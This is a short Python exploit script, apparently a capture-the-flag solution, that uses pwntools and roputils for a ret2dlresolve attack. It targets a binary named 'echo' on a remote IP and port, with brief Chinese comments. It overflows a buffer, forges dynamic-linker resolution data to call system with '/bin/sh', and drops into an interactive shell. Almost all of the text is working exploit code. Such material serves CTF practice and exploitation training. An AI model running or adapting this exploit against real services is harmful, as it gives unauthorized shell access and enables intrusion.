ret2resolve
exp
import sys
import roputils
from pwn import *
context.log_level = 'debug'
#r = process("./pwn")
p = remote("111.198.29.45",37888)
rop = roputils.ROP('./echo')
addr_bss = rop.section('.bss')
offset = 0x3e
buf = rop.retfill(offset)
buf += rop.call('gets',addr_bss)#这里addr_bss是gets函数的参数
buf += rop.dl_resolve_call(addr_bss+20, addr_bss)#20是伪造栈的长度
p.sendline(buf)
buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
buf += rop.dl_resolve_data(addr_bss+20, 'system')
buf += rop.fill(100, buf)
p.recvuntil("\n")
p.sendline(buf)
p.interactive()